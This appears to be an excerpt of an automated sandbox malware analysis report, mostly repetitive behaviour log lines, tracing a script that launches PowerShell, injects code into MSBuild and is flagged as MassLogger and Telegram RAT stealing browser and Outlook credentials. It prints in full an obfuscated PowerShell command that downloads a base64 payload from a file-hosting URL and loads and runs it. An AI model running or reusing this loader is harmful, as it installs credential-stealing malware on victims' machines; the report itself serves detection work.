                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeMemory allocated: 1E4C45D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\wscript.exeMemory allocated: 1DCC3D70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\wscript.exeMemory allocated: 1DCC3DF0000 memory commit | memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\wscript.exeMemory allocated: 1DCC3E30000 memory commit | memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 10F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4407Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5434Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: wscript.exe, 00000000.00000002.1741043297.000001E4C4E30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
                  Source: powershell.exe, 00000001.00000002.1857748193.000001A45F3CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 00000003.00000002.2952093399.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_7528.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7416, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTR
                  .NET source code references suspicious native API functions
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41A000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41C000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 80F008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nix_5t0lxhobjilnb9crviabpjrw2dlc-lxeodjpf_z_1mp6cuqbs5kcpta&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = new-object system.net.webclient;$unturf = $nonsymmetrical.downloaddata($erlenmeyer);$aspectabund = [system.text.encoding]::utf8.getstring($unturf);$cristiform = '<<base64_start>>';$doura = '<<base64_end>>';$postmodifier = $aspectabund.indexof($cristiform);$propylaeum = $aspectabund.indexof($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.substring($postmodifier, $thoracici);$huhus = [system.convert]::frombase64string($tattooings);$homotaxic = [system.reflection.assembly]::load($huhus);$nonrehydrated = [dnlib.io.home].getmethod('vai').invoke($null, [object[]] @($emasculation,'','','','msbuild','','','','','','','','','',''))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nix_5t0lxhobjilnb9crviabpjrw2dlc-lxeodjpf_z_1mp6cuqbs5kcpta&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = new-object system.net.webclient;$unturf = $nonsymmetrical.downloaddata($erlenmeyer);$aspectabund = [system.text.encoding]::utf8.getstring($unturf);$cristiform = '<<base64_start>>';$doura = '<<base64_end>>';$postmodifier = $aspectabund.indexof($cristiform);$propylaeum = $aspectabund.indexof($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.substring($postmodifier, $thoracici);$huhus = [system.convert]::frombase64string($tattooings);$homotaxic = [system.reflection.assembly]::load($huhus);$nonrehydrated = [dnlib.io.home].getmethod('vai').invoke($null, [object[]] @($emasculation,'','','','msbuild','','','','','','','','','',''))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a458530838.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a458530838.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a458530838.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2955066393.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MassLogger RAT
